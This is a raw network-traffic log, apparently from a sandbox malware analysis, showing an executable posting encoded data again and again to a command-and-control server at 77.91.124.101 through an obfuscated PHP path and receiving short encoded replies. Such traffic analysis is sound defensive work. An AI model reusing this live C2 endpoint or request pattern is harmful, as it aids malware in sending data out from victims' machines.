Nov 21, 2023 04:48:15.129034042 CET	465	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:14 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
73	192.168.2.5	49788	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:14.724189043 CET	462	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:14.922880888 CET	462	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:14.923093081 CET	465	OUT	Data Raw: 57 5f 58 59 5b 5f 5f 59 5d 57 55 57 55 5d 57 52 50 5e 58 45 56 55 57 5b 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: W_XY[__Y]WUWU]WRP^XEVUW[^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'^;-Z?;V=,2#)9_)0R0"W'9-8</&G''^)+
Nov 21, 2023 04:48:15.129034042 CET	465	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:14 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
74	77.91.124.101	80	192.168.2.5	49789	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:16.791912079 CET	466	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:16.989553928 CET	466	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:17.181687117 CET	467	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:16 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
74	192.168.2.5	49789	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:16.791912079 CET	466	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:16.989553928 CET	466	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:17.181687117 CET	467	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:16 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
75	192.168.2.5	49790	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:17.179908991 CET	467	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 1396 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:17.377446890 CET	468	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:17.377918959 CET	470	OUT	Data Raw: 57 50 58 51 5e 5e 5f 5c 5d 57 55 57 55 5e 57 5b 50 59 58 48 56 56 57 5f 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: WPXQ^^_\]WUWU^W[PYXHVVW_^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'_*=X<(2R=# ;54:Y?3"V'1'%,;?->&G''^)
Nov 21, 2023 04:48:17.580379963 CET	473	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:17 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 152 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 01 10 22 1f 26 3f 23 05 34 33 23 55 3c 3a 32 0b 2e 2e 25 1b 3f 20 29 11 32 3d 28 5f 27 29 3d 50 3c 2f 30 11 30 39 2c 51 37 18 0a 11 2a 20 21 5a 0c 1d 26 15 35 28 23 55 3c 07 3b 03 3c 2d 0e 5c 32 21 01 5c 2b 07 3f 16 34 0d 09 1f 31 0a 3b 0b 2f 59 21 5f 3a 01 2e 44 27 2c 31 01 34 17 23 5f 0c 14 27 18 35 0f 20 02 22 30 29 09 23 37 1a 14 23 37 27 1f 30 3d 0d 0e 26 5e 21 14 3c 38 38 52 31 09 06 51 27 29 2b 1d 31 00 23 13 3c 00 26 54 2a 0e 2b 48 02 36 5a 50 Data Ascii: "&?#43#U<:2..%? )2=(_')=P</009,Q7* !Z&5(#U<;<-\2!\+?41;/Y!_:.D',14#_'5 "0)#7#7'0=&^!<88R1Q')+1#<&T*+H6ZP

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
75	77.91.124.101	80	192.168.2.5	49790	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:17.179908991 CET	467	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 1396 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:17.377446890 CET	468	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:17.377918959 CET	470	OUT	Data Raw: 57 50 58 51 5e 5e 5f 5c 5d 57 55 57 55 5e 57 5b 50 59 58 48 56 56 57 5f 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: WPXQ^^_\]WUWU^W[PYXHVVW_^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'_*=X<(2R=# ;54:Y?3"V'1'%,;?->&G''^)
Nov 21, 2023 04:48:17.580379963 CET	473	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:17 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 152 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 01 10 22 1f 26 3f 23 05 34 33 23 55 3c 3a 32 0b 2e 2e 25 1b 3f 20 29 11 32 3d 28 5f 27 29 3d 50 3c 2f 30 11 30 39 2c 51 37 18 0a 11 2a 20 21 5a 0c 1d 26 15 35 28 23 55 3c 07 3b 03 3c 2d 0e 5c 32 21 01 5c 2b 07 3f 16 34 0d 09 1f 31 0a 3b 0b 2f 59 21 5f 3a 01 2e 44 27 2c 31 01 34 17 23 5f 0c 14 27 18 35 0f 20 02 22 30 29 09 23 37 1a 14 23 37 27 1f 30 3d 0d 0e 26 5e 21 14 3c 38 38 52 31 09 06 51 27 29 2b 1d 31 00 23 13 3c 00 26 54 2a 0e 2b 48 02 36 5a 50 Data Ascii: "&?#43#U<:2..%? )2=(_')=P</009,Q7* !Z&5(#U<;<-\2!\+?41;/Y!_:.D',14#_'5 "0)#7#7'0=&^!<88R1Q')+1#<&T*+H6ZP

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
76	77.91.124.101	80	192.168.2.5	49791	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:17.300045013 CET	468	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:17.496331930 CET	470	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:17.531966925 CET	472	OUT	Data Raw: 52 58 58 5c 5e 5e 5f 5d 5d 57 55 57 55 59 57 5a 50 58 58 45 56 51 57 59 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: RXX\^^_]]WUWUYWZPXXEVQWY^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'*;=+;.>8,'67:2(3&>-&#=,;<,8&G''^)
Nov 21, 2023 04:48:17.733270884 CET	473	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:17 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
76	192.168.2.5	49791	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:17.300045013 CET	468	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:17.496331930 CET	470	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:17.531966925 CET	472	OUT	Data Raw: 52 58 58 5c 5e 5e 5f 5d 5d 57 55 57 55 59 57 5a 50 58 58 45 56 51 57 59 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: RXX\^^_]]WUWUYWZPXXEVQWY^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'*;=+;.>8,'67:2(3&>-&#=,;<,8&G''^)
Nov 21, 2023 04:48:17.733270884 CET	473	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:17 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
77	77.91.124.101	80	192.168.2.5	49792	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:18.050329924 CET	474	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue
Nov 21, 2023 04:48:18.251388073 CET	474	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:18.251651049 CET	477	OUT	Data Raw: 52 5c 58 58 5b 5c 5f 5e 5d 57 55 57 55 59 57 50 50 5b 58 48 56 55 57 5f 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: R\XX[\_^]WUWUYWPP[XHVUW_^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'\)^"(+>*?;76Z#)?R'-.Q' V->X<?+\,&G''^)
Nov 21, 2023 04:48:18.462958097 CET	477	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:18 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
77	192.168.2.5	49792	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:18.050329924 CET	474	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue
Nov 21, 2023 04:48:18.251388073 CET	474	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:18.251651049 CET	477	OUT	Data Raw: 52 5c 58 58 5b 5c 5f 5e 5d 57 55 57 55 59 57 50 50 5b 58 48 56 55 57 5f 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: R\XX[\_^]WUWUYWPP[XHVUW_^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'\)^"(+>*?;76Z#)?R'-.Q' V->X<?+\,&G''^)
Nov 21, 2023 04:48:18.462958097 CET	477	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:18 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
78	77.91.124.101	80	192.168.2.5	49793	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:18.790292025 CET	478	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:18.986663103 CET	478	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:18.986892939 CET	480	OUT	Data Raw: 57 5c 58 50 5b 59 5f 5d 5d 57 55 57 55 56 57 5b 50 5f 58 41 56 57 57 52 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: W\XP[Y_]]WUWUVW[P_XAVWWR^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'^=81^<+*V)3<8&Z#=+50=.$0&R9+]?,;Y/&G''^)
Nov 21, 2023 04:48:19.188397884 CET	481	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:18 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
78	192.168.2.5	49793	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:18.790292025 CET	478	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:18.986663103 CET	478	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:18.986892939 CET	480	OUT	Data Raw: 57 5c 58 50 5b 59 5f 5d 5d 57 55 57 55 56 57 5b 50 5f 58 41 56 57 57 52 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: W\XP[Y_]]WUWUVW[P_XAVWWR^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'^=81^<+*V)3<8&Z#=+50=.$0&R9+]?,;Y/&G''^)
Nov 21, 2023 04:48:19.188397884 CET	481	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:18 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
79	192.168.2.5	49794	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:19.503804922 CET	482	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:19.702590942 CET	482	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:19.702955961 CET	484	OUT	Data Raw: 57 5a 5d 5c 5b 5e 5a 5a 5d 57 55 57 55 57 57 57 50 5c 58 41 56 5e 57 53 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: WZ]\[^ZZ]WUWUWWWP\XAV^WS^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'_%^(+',42#!_(0>P'-)'#99(*\?;/&G''^)
Nov 21, 2023 04:48:19.906702995 CET	485	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:19 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
79	77.91.124.101	80	192.168.2.5	49794	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:19.503804922 CET	482	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:19.702590942 CET	482	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:19.702955961 CET	484	OUT	Data Raw: 57 5a 5d 5c 5b 5e 5a 5a 5d 57 55 57 55 57 57 57 50 5c 58 41 56 5e 57 53 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: WZ]\[^ZZ]WUWUWWWP\XAV^WS^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'_%^(+',42#!_(0>P'-)'#99(*\?;/&G''^)
Nov 21, 2023 04:48:19.906702995 CET	485	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:19 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.5	49720	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:47:31.758867979 CET	175	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:47:31.958381891 CET	175	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:47:31.958623886 CET	177	OUT	Data Raw: 52 5f 58 59 5b 5c 5a 5d 5d 57 55 57 55 5f 57 55 50 53 58 49 56 53 57 5b 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: R_XY[\Z]]WUWU_WUPSXIVSW[^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$=!X?9=#+.47&('=$ -,;-?<X;>&G''^)#
Nov 21, 2023 04:47:32.168170929 CET	178	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:47:31 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	77.91.124.101	80	192.168.2.5	49720	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
